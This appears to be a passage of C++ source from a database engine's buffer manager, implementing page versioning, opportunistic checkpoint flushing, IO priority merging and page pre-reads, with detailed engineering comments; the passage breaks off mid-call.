ERR ErrBFIMaintImpedingPageLatch( PBF pbf, __in const BOOL fOwnsWrite, BFLatch* pbfl )
{
ERR err = JET_errSuccess;
PBF pbfVer = NULL;
BOOL fUrgentMaintReq = fFalse;
Assert( PBF( pbfl->dwContext ) == pbf );
Assert( fOwnsWrite ?
pbf->sxwl.FOwnWriteLatch() :
pbf->sxwl.FOwnExclusiveLatch() );
// first we attempt to complete the write IO / flush as then we may not have to version
// copy the page
if ( !FBFIUpdatablePage( pbf ) )
{
Assert( wrnBFPageFlushPending == pbf->err );
if ( FBFICompleteFlushPage( pbf, fOwnsWrite ? bfltWrite : bfltExclusive ) )
{
// completed the state transition associated with the write IO ...
Assert( pbf->err < JET_errSuccess || pbf->bfdf == bfdfClean );
Assert( FBFIUpdatablePage( pbf ) );
}
// With view-cache remapping, the FBFICompleteFlushPage() can leave
// the buffer in a freshly IO-error'd state (as if there was a read
// IO error) ... but since this function never really returned such
// before (assuming it was validated fully on relatch), we take the
// less risky approach of faking a latch conflict and let the buffer
// return the true error on the relatch path.
if ( pbf->err < JET_errSuccess )
{
Error( ErrERRCheck( errBFLatchConflict ) );
}
}
// cache this info, so that when we unlatch below we know if we were doing this action to
// unburden a Write IO.
const BOOL fInIo = !FBFIUpdatablePage( pbf );
if ( fInIo ||
FBFIMaintIsImpedingCheckpointMaintenance( pbf, &fUrgentMaintReq ) )
{
// If we're trying to unburden an immutable (i.e. undergoing write) page, we must wait for
// a new buffer to be allocated to avoid likely failure ...
fUrgentMaintReq = fUrgentMaintReq || fInIo;
Call( ErrBFIVersionCopyPage( pbf, &pbfVer, fUrgentMaintReq, fOwnsWrite ) );
// We've a newer (pbfVer) version of the page, and pbf is now old
Assert( pbfVer );
if ( pbf->bfdf > bfdfClean )
{
Assert( pbf->pbfTimeDepChainPrev == pbfVer );
Assert( pbfVer->pbfTimeDepChainNext == pbf );
}
// check proper cross pollination ...
Assert( !FBFICurrentPage( pbf, pbfVer->ifmp, pbfVer->pgno ) );
Assert( FBFICurrentPage( pbfVer, pbf->ifmp, pbf->pgno ) );
if ( fOwnsWrite )
{
pbf->sxwl.ReleaseWriteLatch();
}
else
{
pbf->sxwl.ReleaseExclusiveLatch();
}
if ( g_fBFEnableForegroundCheckpointMaint )
{
// Note: The fInIo case won't really do another Write IO, even if the IO on it
// completed while we were VersionCopy'ing the page. What happens instead is
// ErrBFIFlushPage re-acquires x-latch, sees IO is in the signaled state and
// completes the IO instead of writing again. If it did issue, it would be a
// probably harmless but unnecessary double write, a write of a logically about
// to be made clean page. We'll use a different iorp to detect such a possible
// bug in trace, though we should never see / issue an IO with this iorp.
// Update: Actually it _can_ happen if the previous BF write had an IO error and
// so failed to get the page to clean state ... this code then saw it was in an
// IO ... tried to flush b/c it is still dirty ... BUT we still won't issue the
// actual IO to the FS, because ErrBFIPrepareFlushPage will reject the page for
// flushes of a BF with a negative / failed pbf->err - because write ERRs in ESE,
// at least for the moment, are permanent.
BFIOpportunisticallyFlushPage( pbf, fInIo ? iorpBFImpedingWriteCleanDoubleIo : iorpBFCheckpointAdv );
}
Assert( PBF( pbfl->dwContext ) != pbfVer );
pbfl->dwContext = (DWORD_PTR)pbfVer;
pbfl->pv = pbfVer->pv;
// we are going to claim this as a latch conflict for now ...
PERFOpt( cBFLatchConflict.Inc( perfinstGlobal ) );
err = ErrERRCheck( wrnBFLatchMaintConflict );
}
HandleError:
if( err < JET_errSuccess && FBFIUpdatablePage( pbf ) )
{
// This is not a big deal as we did not HAVE to version unload this buffer ...
err = JET_errSuccess;
}
// validate our expectations
if ( JET_errSuccess == err || err < JET_errSuccess )
{
// Verify we did nothing ...
Assert( JET_errSuccess == err || JET_errOutOfMemory == err || JET_errOutOfBuffers == err );
Assert( pbf == PBF( pbfl->dwContext ) );
Assert( fOwnsWrite ?
pbf->sxwl.FOwnWriteLatch() :
pbf->sxwl.FOwnExclusiveLatch() );
}
else
{
Assert( wrnBFLatchMaintConflict == err );
Assert( pbf != PBF( pbfl->dwContext ) );
Assert( pbf->sxwl.FNotOwner() );
Assert( pbfVer->sxwl.FOwnWriteLatch() );
}
return err;
}
// Returns true if this buffer / page needs opportunistic flushing due to
// falling behind or checkpoint hot page contention
BOOL FBFIMaintNeedsOpportunisticFlushing( PBF pbf )
{
const IFMP ifmp = pbf->ifmp;
INST * pinst = PinstFromIfmp( ifmp );
LOG * plog = pinst->m_plog;
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
const ULONG_PTR cbCheckpointDepthPreferred = pinst->m_plog->CbLGDesiredCheckpointDepth();
if ( pinst->m_fCheckpointQuiesce )
{
// We will let the checkpoint thread handle the quiesce case
return fFalse;
}
if ( pbf->bfdf > bfdfClean && // just OB0 is not enough, see BFDirty OB0 reset comment
CmpLgpos( &pbf->lgposOldestBegin0, &lgposMax ) )
{
// we're a logged page ... see if any of the reasons we version are true
//
// Is the page hot / latch contended and impeding the checkpoint.
//
const BOOL fHotPage = plog->CbLGOffsetLgposForOB0( plog->LgposLGLogTipNoLock(), pbf->lgposOldestBegin0 ) > cbCheckpointDepthPreferred &&
( pbf->sxwl.CWaitExclusiveLatch() || pbf->sxwl.CWaitWriteLatch() ) ;
//
// opportune foreground checkpoint maint ...
//
// A subtle trick is accomplished by this ... as soon as a page moves beyond
// the checkpoint the next time it is write|excl unlatched/downgraded we will
// then opportunistically version (and probably flush, though the callers are
// doing the flushing here) the page ... this moves IO onto foreground worker
// threads, and probably smooths out the IO as well.
// If we set this difference even lower than JET_paramCheckpointDepthMax we
// would move even more IO to the foreground ... though only for repeatedly
// touched or hot-ish excl latched pages ...
const BOOL fForegroundCheckpointMaint = g_fBFEnableForegroundCheckpointMaint &&
plog->CbLGOffsetLgposForOB0( plog->LgposLGLogTipNoLock(), pbf->lgposOldestBegin0 ) > cbCheckpointDepthPreferred;
// to disable opportune foreground checkpoint advancement ...
//const BOOL fForegroundCheckpointAdvancement = fFalse;
// concurrency simulation
const BOOL fRandomChance = FBFIChance( 10 );
//
// if this IFMP / PGNO is impeding the checkpoint ...
//
// NOTE: there is no need to version the page if it is already
// versioned ( pbf->pbfTimeDepChainNext != pbfNil ).
if ( pbf->pbfTimeDepChainNext == pbfNil &&
( fHotPage || fForegroundCheckpointMaint || fRandomChance ) )
{
return fTrue;
}
}
return fFalse;
}
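// The two helpers below pair this check with the two versioning primitives:
// BFIOpportunisticallyVersionPage() uses classic versioning (ErrBFIVersionPage, which
// requires an updatable buffer), while BFIOpportunisticallyVersionCopyPage() uses the
// "inverted" ErrBFIVersionCopyPage, which works even while the buffer is undergoing
// write IO.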
// This performs foreground checkpoint maintenance in a way that is compatible
// only with an un-burdened buffer (i.e. not currently under write IO - see the
// FBFIUpdatablePage() assert in ErrBFIVersionPage)
void BFIOpportunisticallyVersionPage( PBF pbf, PBF * ppbfOpportunisticCheckpointAdv )
{
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
Assert( ppbfOpportunisticCheckpointAdv );
*ppbfOpportunisticCheckpointAdv = NULL;
if ( FBFIMaintNeedsOpportunisticFlushing( pbf ) )
{
if ( ErrBFIVersionPage( pbf, ppbfOpportunisticCheckpointAdv, fFalse ) >= JET_errSuccess )
{
Assert( pbf->pbfTimeDepChainNext != pbfNil );
(*ppbfOpportunisticCheckpointAdv)->sxwl.ReleaseWriteLatch();
}
}
}
// This performs foreground checkpoint maintenance in a way that is compatible
// even with a burdened buffer (i.e. one currently undergoing write IO), since
// ErrBFIVersionCopyPage leaves the old image in place for the IO to complete
void BFIOpportunisticallyVersionCopyPage( PBF pbf, PBF * ppbfNew, __in const BOOL fOwnsWrite )
{
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
Assert( pbf->bfdf >= bfdfClean );
Assert( ppbfNew );
*ppbfNew = NULL;
// Disable cleanup checking
// Opportunistic operation. Doesn't affect main operation.
const BOOL fCleanUpStateSaved = FOSSetCleanupState( fFalse );
if ( FBFIMaintNeedsOpportunisticFlushing( pbf ) )
{
if ( ErrBFIVersionCopyPage( pbf, ppbfNew, fFalse, fOwnsWrite ) >= JET_errSuccess )
{
Assert( (*ppbfNew)->pbfTimeDepChainNext != pbfNil );
Assert( (*ppbfNew)->pbfTimeDepChainNext == pbf );
Assert( pbf->pbfTimeDepChainPrev == (*ppbfNew) );
}
}
// Restore cleanup checking
FOSSetCleanupState( fCleanUpStateSaved );
}
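// ErrBFIVersionPage: pbf stays the current version; its dirty image is copied into a newly
// allocated *older* BF (ppbfOld), which inherits lgposOldestBegin0 / lgposModify / undo info
// so it can be flushed independently, while pbf is freed up to take further updates.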
ERR ErrBFIVersionPage( PBF pbf, PBF* ppbfOld, const BOOL fWait )
{
ERR err = JET_errSuccess;
BFLRUK::ERR errLRUK = BFLRUK::ERR::errSuccess;
TraceContextScope tcVerPage;
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
Assert( !!pbf->fCurrentVersion == !pbf->fOlderVersion );
Assert( FBFIUpdatablePage( pbf ) ); // we are in trouble if we're undergoing IO ...
if ( pbf->fAbandoned )
{
Error( ErrERRCheck( errBFIPageAbandoned ) );
}
Assert( ( pbf->err >= JET_errSuccess ) || ( pbf->bfdf > bfdfClean ) );
// Note: we use icbPage not icbBuffer because we know this buffer will be written out (hopefully soon)
const ICBPage icbNewOrigBuffer = (ICBPage)pbf->icbBuffer;
// Because the buffer is dirty, we expect it to be fully hydrated.
Expected( pbf->icbBuffer == pbf->icbPage );
// allocate a new BF to contain the OLD version of the given BF
Call( ErrBFIAllocPage( ppbfOld, icbNewOrigBuffer, fWait ) );
Assert( (*ppbfOld)->sxwl.FOwnWriteLatch() );
BFIAssertNewlyAllocatedPage( *ppbfOld );
// if we are mapping views then alloc a page of memory to hold the page image
if ( BoolParam( JET_paramEnableViewCache ) )
{
const size_t cbAlloc = g_rgcbPageSize[icbNewOrigBuffer];
if ( !( (*ppbfOld)->pv = PvOSMemoryPageAlloc( cbAlloc, NULL ) ) )
{
// release our allocated BF
BFIFreePage( *ppbfOld );
// bail with out of memory
Call( ErrERRCheck( JET_errOutOfMemory ) );
}
(*ppbfOld)->bfat = bfatPageAlloc;
}
Assert( FBFIValidPvAllocType( (*ppbfOld) ) );
Assert( (*ppbfOld)->bfat != bfatNone );
// set this BF to contain this IFMP / PGNO
Assert( ifmpNil != pbf->ifmp );
(*ppbfOld)->ifmp = pbf->ifmp;
(*ppbfOld)->pgno = pbf->pgno;
(*ppbfOld)->fAbandoned = pbf->fAbandoned; // just in case (we're already rejecting abandoned pages above).
(*ppbfOld)->icbPage = pbf->icbPage;
(*ppbfOld)->tce = pbf->tce;
PERFOpt( cBFCache.Inc( PinstFromIfmp( (*ppbfOld)->ifmp ), (*ppbfOld)->tce, (*ppbfOld)->ifmp ) );
Assert( icbPageInvalid != (*ppbfOld)->icbBuffer );
AtomicIncrement( &g_rgcbfCachePages[(*ppbfOld)->icbBuffer] );
Assert( g_rgcbfCachePages[(*ppbfOld)->icbBuffer] > 0 );
// insert this IFMP / PGNO in the LRUK. do not use history and set priority to min so that the
// old BF will be evicted ASAP
errLRUK = g_bflruk.ErrCacheResource( IFMPPGNO( pbf->ifmp, pbf->pgno ),
*ppbfOld,
TickOSTimeCurrent(),
g_pctCachePriorityMin,
fFalse );
// we failed to insert this IFMP / PGNO in the LRUK
if ( errLRUK != BFLRUK::ERR::errSuccess )
{
Assert( errLRUK == BFLRUK::ERR::errOutOfMemory );
// release our temp memory if any
if ( BoolParam( JET_paramEnableViewCache ) )
{
Assert( (*ppbfOld)->bfat == bfatPageAlloc ); // we JUST set this above?
OSMemoryPageFree( (*ppbfOld)->pv );
(*ppbfOld)->pv = NULL;
(*ppbfOld)->bfat = bfatNone;
}
// release our allocated BF
BFIFreePage( *ppbfOld );
// bail with out of memory
Call( ErrERRCheck( JET_errOutOfMemory ) );
}
// we are past the point of no failure
Assert( icbNewOrigBuffer == pbf->icbBuffer );
Assert( pbf->icbBuffer == (*ppbfOld)->icbBuffer );
UtilMemCpy( (*ppbfOld)->pv, pbf->pv, g_rgcbPageSize[icbNewOrigBuffer] );
// copy the error state
(*ppbfOld)->err = pbf->err;
// mark both BFs as dirty. if the given BF is filthy, move the filthy state
// to the old BF
BFIDirtyPage( pbf, bfdfDirty, *tcVerPage ); // Tracing context on the BF will be copied to the versioned BF
BFIDirtyPage( *ppbfOld, BFDirtyFlags( pbf->bfdf ), *tcVerPage );
Expected( bfdfDirty <= pbf->bfdf );
pbf->bfdf = bfdfDirty;
// move the lgpos information to the old BF because it is tied with the
// flush of the relevant data
BFISetLgposOldestBegin0( *ppbfOld, pbf->lgposOldestBegin0, *tcVerPage );
BFIResetLgposOldestBegin0( pbf );
g_critBFDepend.Enter();
// add ourself as a time dependency to the given BF
(*ppbfOld)->pbfTimeDepChainNext = pbf->pbfTimeDepChainNext;
(*ppbfOld)->pbfTimeDepChainPrev = pbf;
pbf->pbfTimeDepChainNext = *ppbfOld;
if ( (*ppbfOld)->pbfTimeDepChainNext != pbfNil )
{
(*ppbfOld)->pbfTimeDepChainNext->pbfTimeDepChainPrev = *ppbfOld;
}
(*ppbfOld)->fOlderVersion = fTrue;
// if the given BF cannot be flushed because a dependency was purged then
// we cannot allow the old BF to be flushable either
if ( pbf->bfbitfield.FDependentPurged() )
{
(*ppbfOld)->bfbitfield.SetFDependentPurged( fTrue );
}
// The newer version of the page isn't impeding the checkpoint, only the older one ...
(*ppbfOld)->bfbitfield.SetFImpedingCheckpoint( pbf->bfbitfield.FImpedingCheckpoint() );
pbf->bfbitfield.SetFImpedingCheckpoint( fFalse );
g_critBFDepend.Leave();
if ( pbf->prceUndoInfoNext == prceNil )
{
// Simple case, no RCEs to transfer. Just move lgposModify.
BFISetLgposModify( *ppbfOld, pbf->lgposModify );
BFIResetLgposModify( pbf );
}
else
{
// Move our undo info to the old BF because its removal is tied with the
// flush of the relevant data.
//
// NOTE: this must be done after linking in the versioned page so that it
// is always possible to reach an RCE containing undo info from the hash
// table.
// These are hashed critical sections, but we establish an order to avoid deadlocks.
CCriticalSection* const pcrit = &g_critpoolBFDUI.Crit( pbf );
CCriticalSection* const pcritOld = &g_critpoolBFDUI.Crit( *ppbfOld );
CCriticalSection* const pcritMax = max( pcrit, pcritOld );
CCriticalSection* const pcritMin = min( pcrit, pcritOld );
ENTERCRITICALSECTION ecsMax( pcritMax );
ENTERCRITICALSECTION ecsMin( pcritMin, pcritMin != pcritMax );
(*ppbfOld)->prceUndoInfoNext = pbf->prceUndoInfoNext;
pbf->prceUndoInfoNext = prceNil;
// We are adjusting lgposModify under the DUI lock because BFRemoveUndoInfo
// does not take page latches, so we need to make sure there is consistency
// between this code path and removing undo info.
BFISetLgposModify( *ppbfOld, pbf->lgposModify );
BFIResetLgposModify( pbf );
}
(*ppbfOld)->rbsposSnapshot = pbf->rbsposSnapshot;
pbf->rbsposSnapshot = rbsposMin;
// keep versioned page stats
PERFOpt( cBFPagesVersioned.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
PERFOpt( AtomicIncrement( (LONG*)&g_cBFVersioned ) );
ETCacheVersionPage( pbf->ifmp, pbf->pgno );
// update our page write stats
//
// NOTE: page versioning is a "virtual" flush
if ( !pbf->fFlushed )
{
pbf->fFlushed = fTrue;
}
else
{
(*ppbfOld)->fFlushed = fTrue;
}
return JET_errSuccess;
HandleError:
Assert( err < JET_errSuccess ); // no warnings.
*ppbfOld = pbfNil;
return err;
}
// "Inverted" Version Page
// This takes a pbf that will be the "older" version of the page, and creates a
// newer version of the page in a new buffer.
//
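// Sketch of the state transition (success path):
//
//   before:  g_bfhash[ifmp:pgno] -> pbfOrigOld (fCurrentVersion)
//   after:   g_bfhash[ifmp:pgno] -> pbfNewCurr (fCurrentVersion, returned w-latched)
//                pbfNewCurr->pbfTimeDepChainNext == pbfOrigOld (now fOlderVersion,
//                keeping its lgposOldestBegin0 / lgposModify / undo info for flushing)
//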
ERR ErrBFIVersionCopyPage( PBF pbfOrigOld, PBF* ppbfNewCurr, const BOOL fWait, __in const BOOL fOwnsWrite )
{
ERR err = JET_errSuccess;
BFLRUK::CLock lockLRUK;
BFLRUK::ERR errLRUK = BFLRUK::ERR::errSuccess;
BFHash::CLock lockHash;
PGNOPBF pgnopbf;
Assert( pbfOrigOld->sxwl.FOwnExclusiveLatch() || pbfOrigOld->sxwl.FOwnWriteLatch() );
Assert( pbfOrigOld->fCurrentVersion );
Assert( !pbfOrigOld->fOlderVersion );
Assert( fOwnsWrite ? pbfOrigOld->sxwl.FOwnWriteLatch() : pbfOrigOld->sxwl.FNotOwnWriteLatch() );
if ( !fOwnsWrite )
{
CSXWLatch::ERR errWL = pbfOrigOld->sxwl.ErrUpgradeExclusiveLatchToWriteLatch();
if ( errWL != CSXWLatch::ERR::errSuccess )
{
Assert( CSXWLatch::ERR::errWaitForWriteLatch == errWL );
pbfOrigOld->sxwl.WaitForWriteLatch();
}
}
Assert( pbfOrigOld->sxwl.FOwnWriteLatch() );
if ( pbfOrigOld->fAbandoned )
{
Error( ErrERRCheck( errBFIPageAbandoned ) );
}
Assert( ( pbfOrigOld->err >= JET_errSuccess ) || ( pbfOrigOld->bfdf > bfdfClean ) );
// allocate a new BF to contain the NEW version of the given BF
// Note: We use the current buffer size, but when we version we could consider compressing since we have
// to move it anyway.
const ICBPage icbNewCurrBuffer = (ICBPage)pbfOrigOld->icbBuffer;
Call( ErrBFIAllocPage( ppbfNewCurr, icbNewCurrBuffer, fWait ) );
Assert( (*ppbfNewCurr)->sxwl.FOwnWriteLatch() );
BFIAssertNewlyAllocatedPage( *ppbfNewCurr );
// if we are mapping views then alloc a page of memory to hold the page image
if ( BoolParam( JET_paramEnableViewCache ) )
{
const size_t cbAlloc = g_rgcbPageSize[icbNewCurrBuffer];
const BOOL fCleanUpStateSaved = FOSSetCleanupState( fFalse );
if ( !( (*ppbfNewCurr)->pv = PvOSMemoryPageAlloc( cbAlloc, NULL ) ) )
{
// Restore cleanup checking
FOSSetCleanupState( fCleanUpStateSaved );
// release our allocated BF
BFIFreePage( *ppbfNewCurr );
// bail with out of memory
Call( ErrERRCheck( JET_errOutOfMemory ) );
}
(*ppbfNewCurr)->bfat = bfatPageAlloc;
// Restore cleanup checking
FOSSetCleanupState( fCleanUpStateSaved );
}
Assert( FBFIValidPvAllocType( (*ppbfNewCurr) ) );
Assert( (*ppbfNewCurr)->bfat != bfatNone );
// set this BF to contain this IFMP / PGNO
Assert( ifmpNil != pbfOrigOld->ifmp );
(*ppbfNewCurr)->ifmp = pbfOrigOld->ifmp;
(*ppbfNewCurr)->pgno = pbfOrigOld->pgno;
(*ppbfNewCurr)->fAbandoned = pbfOrigOld->fAbandoned; // just in case (we're already rejecting abandoned pages above).
(*ppbfNewCurr)->icbPage = pbfOrigOld->icbPage;
(*ppbfNewCurr)->tce = pbfOrigOld->tce;
PERFOpt( cBFCache.Inc( PinstFromIfmp( (*ppbfNewCurr)->ifmp ), (*ppbfNewCurr)->tce, (*ppbfNewCurr)->ifmp ) );
Assert( icbPageInvalid != (*ppbfNewCurr)->icbBuffer );
AtomicIncrement( &g_rgcbfCachePages[(*ppbfNewCurr)->icbBuffer] );
Assert( g_rgcbfCachePages[(*ppbfNewCurr)->icbBuffer] > 0 );
// insert this IFMP / PGNO in the LRUK. use the original BF as history so
// that the new BF is treated like the original BF would have been.
BFISynchronicity();
errLRUK = g_bflruk.ErrCacheResource( IFMPPGNO( pbfOrigOld->ifmp, pbfOrigOld->pgno ),
*ppbfNewCurr,
TickOSTimeCurrent(),
g_pctCachePriorityNeutral, // priority is not relevant because the priority in pbfOrigOld will override this value
fFalse,
NULL,
pbfOrigOld );
BFISynchronicity();
// we failed to insert this IFMP / PGNO in the LRUK
if ( errLRUK != BFLRUK::ERR::errSuccess )
{
Assert( errLRUK == BFLRUK::ERR::errOutOfMemory );
// release our temp memory if any
if ( BoolParam( JET_paramEnableViewCache ) )
{
Assert( (*ppbfNewCurr)->bfat == bfatPageAlloc ); // we JUST set this above?
OSMemoryPageFree( (*ppbfNewCurr)->pv );
(*ppbfNewCurr)->pv = NULL;
(*ppbfNewCurr)->bfat = bfatNone;
}
// release our allocated BF
BFIFreePage( *ppbfNewCurr );
// bail with out of memory
Call( ErrERRCheck( JET_errOutOfMemory ) );
}
// past the point of no failure
// write lock this IFMP / PGNO in the hash table to prevent new
// latch attempts on this BF
BFISynchronicity();
g_bfhash.WriteLockKey( IFMPPGNO( pbfOrigOld->ifmp, pbfOrigOld->pgno ), &lockHash );
BFISynchronicity();
//
// Have a new page, w-latch, and g_bfhash table latch ... we can do ANYTHING now ...
//
pgnopbf.pgno = pbfOrigOld->pgno;
pgnopbf.pbf = *ppbfNewCurr;
const BFHash::ERR errHash = g_bfhash.ErrReplaceEntry( &lockHash, pgnopbf );
Assert( BFHash::ERR::errSuccess == errHash );
// save the current BF image
UtilMemCpy( (*ppbfNewCurr)->pv, pbfOrigOld->pv, g_rgcbPageSize[icbNewCurrBuffer] );
// copy the error state
// when it is page flush pending, we'll NOT want to do this ... as the newer version is not in a flush op ...
if ( wrnBFPageFlushPending != pbfOrigOld->err )
{
(*ppbfNewCurr)->err = pbfOrigOld->err;
}
// mark both BFs as dirty. if the given BF is filthy, move the filthy state
// to the old BF
if ( pbfOrigOld->bfdf != bfdfClean )
{
BFIDirtyPage( *ppbfNewCurr, bfdfDirty, *TraceContextScope() ); // Tracing context on the BF will be copied to the versioned BF
BFIDirtyPage( pbfOrigOld, BFDirtyFlags( (*ppbfNewCurr)->bfdf ), *TraceContextScope() ); // just in case
}
else
{
Assert( (*ppbfNewCurr)->bfdf == bfdfClean );
}
BFISynchronicity();
g_critBFDepend.Enter();
BFISynchronicity();
// add ourself as a time dependency to the given BF
(*ppbfNewCurr)->pbfTimeDepChainNext = pbfOrigOld;
(*ppbfNewCurr)->pbfTimeDepChainPrev = pbfNil; // should already be NULL.
pbfOrigOld->pbfTimeDepChainPrev = *ppbfNewCurr;
// update the older/current version info
pbfOrigOld->fOlderVersion = fTrue;
pbfOrigOld->fCurrentVersion = fFalse;
(*ppbfNewCurr)->fOlderVersion = fFalse;
(*ppbfNewCurr)->fCurrentVersion = fTrue;
// if the given BF cannot be flushed because a dependency was purged then
// we cannot allow the new BF to be flushable either
// Well, technically, as SOMEONE points out, because the older version is already
// pinned in this case, it will pin the current version or any subsequent
// versions. Of course, this could be icky because it would allow you to
// start updating the page again ... so for now, leave it FDependentPurged.
if ( pbfOrigOld->bfbitfield.FDependentPurged() )
{
(*ppbfNewCurr)->bfbitfield.SetFDependentPurged( fTrue );
}
// The newer version of the page isn't impeding the checkpoint, only the older one ...
Assert( (*ppbfNewCurr)->bfbitfield.FImpedingCheckpoint() == fFalse );
(*ppbfNewCurr)->bfbitfield.SetFImpedingCheckpoint( fFalse );
BFISynchronicity();
g_critBFDepend.Leave();
BFISynchronicity();
// leave our undo info on the old BF because its removal is tied with the
// flush of the relevant data
//
if ( pbfOrigOld->bfdf == bfdfClean )
{
Assert( pbfOrigOld->prceUndoInfoNext == prceNil );
}
Assert( (*ppbfNewCurr)->prceUndoInfoNext == prceNil );
(*ppbfNewCurr)->prceUndoInfoNext = prceNil; // just in case...
// Note: we do not unlock above because then we'd be letting BFRemoveUndoInfo in earlier ... we
// must let this go no sooner than when the version chain is set up.
BFISynchronicity();
g_bfhash.WriteUnlockKey( &lockHash );
BFISynchronicity();
// now that we're outside the g_bfhash lookup table (keep in mind we still have
// the w-latch on the newest / current version of the page), we can update
// our lgpos OB0 information ...
// handle lgpos information because it is tied with the flush of the relevant data
// Do not need to BFISetLgposOldestBegin0() as the old buffer already has it, and the
// new buffer should already be reset, we just allocated it.
Assert( 0 == CmpLgpos( &((*ppbfNewCurr)->lgposOldestBegin0), &lgposMax ) );
BFIResetLgposOldestBegin0( *ppbfNewCurr ); // just in case
if ( pbfOrigOld->bfdf == bfdfClean )
{
// Similar logic in BFDirty() ... move this out of the OB0, so this older clean
// version is completely invisible to our processes. Probably this isn't a requirement.
BFIResetLgposOldestBegin0( pbfOrigOld );
}
// Do not need BFISetLgposModify() as the old buffer already has it.
Assert( 0 == CmpLgpos( &((*ppbfNewCurr)->lgposModify), &lgposMin ) );
BFIResetLgposModify( *ppbfNewCurr ); // just in case
if ( pbfOrigOld->bfdf == bfdfClean )
{
Assert( 0 == CmpLgpos( &(pbfOrigOld->lgposModify), &lgposMin ) );
}
(*ppbfNewCurr)->rbsposSnapshot = rbsposMin; // just in case
// update our page write stats
//
// NOTE: page versioning is a "virtual" flush
if ( !pbfOrigOld->fFlushed )
{
pbfOrigOld->fFlushed = fTrue;
}
else
{
(*ppbfNewCurr)->fFlushed = fTrue;
}
// lighten up on latch if appropriate
Assert( pbfOrigOld->sxwl.FOwnWriteLatch() );
if ( !fOwnsWrite )
{
pbfOrigOld->sxwl.DowngradeWriteLatchToExclusiveLatch();
}
Assert( pbfOrigOld->sxwl.FOwnExclusiveLatch() || pbfOrigOld->sxwl.FOwnWriteLatch() );
Assert( (*ppbfNewCurr)->sxwl.FOwnWriteLatch() );
// keep versioned page stats
PERFOpt( cBFPagesVersionCopied.Inc( PinstFromIfmp( pbfOrigOld->ifmp ), pbfOrigOld->tce ) );
PERFOpt( AtomicIncrement( (LONG*)&g_cBFVersioned ) );
OSTrace( JET_tracetagBufferManager, OSFormat( "Version Copied: %p (0x%d:%d.%d) to %p (0x%d,%d)\n",
pbfOrigOld,
(ULONG)pbfOrigOld->ifmp, pbfOrigOld->pgno,
(ULONG)(*((CPAGE::PGHDR*)pbfOrigOld->pv)).objidFDP,
(*ppbfNewCurr),
(ULONG)(*ppbfNewCurr)->ifmp, (*ppbfNewCurr)->pgno
) );
ETCacheVersionCopyPage( pbfOrigOld->ifmp, pbfOrigOld->pgno );
return JET_errSuccess;
HandleError:
Assert( err < JET_errSuccess ); // no warnings.
AssertRTL( err > -65536 && err < 65536 );
if ( !fOwnsWrite )
{
pbfOrigOld->sxwl.DowngradeWriteLatchToExclusiveLatch();
}
*ppbfNewCurr = pbfNil;
return err;
}
// Merges the IO priority of the INST and the User. The regular flags are merged, but
// since we can only have one Dispatch Priority, the user (if it has a dispatch priority)
// wins / overwrites the default inst dispatch priority.
OSFILEQOS QosBFIMergeInstUserDispPri( const INST * const pinst, const BFTEMPOSFILEQOS qosIoUserBfTemp )
{
OSFILEQOS qosIoUser = (OSFILEQOS)qosIoUserBfTemp;
const OSFILEQOS qosIoDispatch = qosIoUser & qosIODispatchMask;
if ( qosIoDispatch == 0 )
{
qosIoUser |= qosIODispatchImmediate;
}
Expected( ( ( qosIoUser & qosIODispatchMask ) == qosIODispatchImmediate ) || ( ( qosIoUser & qosIODispatchMask ) == qosIODispatchBackground ) );
const OSFILEQOS qosIoUserDispatch = qosIoUser |
// if user priority exists, masks off dispatch mask ...
( ( qosIoUser & qosIODispatchMask ) ?
( ~qosIODispatchMask & QosSyncDefault( pinst ) ) :
QosSyncDefault( pinst ) );
return qosIoUserDispatch;
}
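// To illustrate the precedence (the exact bit values don't matter here): a user qos
// carrying qosIODispatchBackground keeps its own dispatch bits and only picks up the
// non-dispatch bits of QosSyncDefault( pinst ); a user qos with no dispatch bits at all
// is first promoted to qosIODispatchImmediate and then merged the same way.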
// Issues a pre-read for the requested pgno.
//
// If bfprfCombinableOnly is set the API will reject (with errDiskTilt) any page that can't
// be combined with the IO already being built.
ERR ErrBFIPrereadPage( IFMP ifmp, PGNO pgno, const BFPreReadFlags bfprf, const BFPriority bfpri, const TraceContext& tc )
{
ERR err = errBFPageCached;
BFHash::CLock lock;
VOID * pioreqReserved = NULL;
BOOL fBFOwned = fFalse;
PBF pbf = NULL;
if ( !FParentObjectClassSet( tc.nParentObjectClass ) )
{
FireWall( "TcPrereadObjectClassTcNotSet" );
}
// Anything larger than 0x7FFFFFFF will be rejected by the flushmap with
// invalid parameter on latch (and asserted on as we've got good defensive
// code ;).
Expected( pgno <= pgnoSysMax );
Assert( 0 == ( bfprf & bfprfNoIssue ) ); // should be taken care of by outer layers ...
// the IFMP / PGNO was not present in the hash table
if ( !FBFInCache( ifmp, pgno ) )
{
const OSFILEQOS qosIoUserDispatch = QosBFIMergeInstUserDispPri( PinstFromIfmp( ifmp ), QosBFUserAndIoPri( bfpri ) );
const OSFILEQOS qos = qosIoUserDispatch | ( ( bfprf & bfprfCombinableOnly ) ? qosIOOptimizeCombinable : 0 );
//
// Need to do things in a specific order
//
// First alloc the BF (need to do it before allocing the I/O req since
// allocing the BF may involve issuing currently unissued I/O from the
// TLS which can affect whether the I/O req is combinable with existing
// I/O req or not and hence whether it counts against max outstanding
// I/Os or not)
//
// Next alloc the I/O req (need to do it before adding BF to cache since
// allocing the I/O req can fail and we cannot allow a failure after
// adding the BF to the cache since someone may already be waiting for
// it to finish I/O and become unlatched)
//
// Finally add the BF to the cache, note that ErrBFICachePage takes
// ownership of the pre-allocated BF (even in case of failure), so
// make sure to note that
//
Call( ErrBFIAllocPage( &pbf, IcbBFIBufferSize( g_rgfmp[ifmp].CbPage() ), fFalse, fFalse ) );
fBFOwned = fTrue;
err = ErrBFIAsyncPreReserveIOREQ( ifmp, pgno, qos, &pioreqReserved );
CallSx( err, errDiskTilt );
Call( err );
// try to add this page to the cache
// technically this is a write latch, but we will use bfltMax as a sentinel to indicate
// we're pre-reading a page, not latching.
err = ErrBFICachePage( &pbf,
ifmp,
pgno,
fFalse, // fNewPage
fFalse, // fWait
fFalse, // fMRU
PctBFCachePri( bfpri ), // pctCachePriority
tc, // tc
bfltMax, // bfltTraceOnly
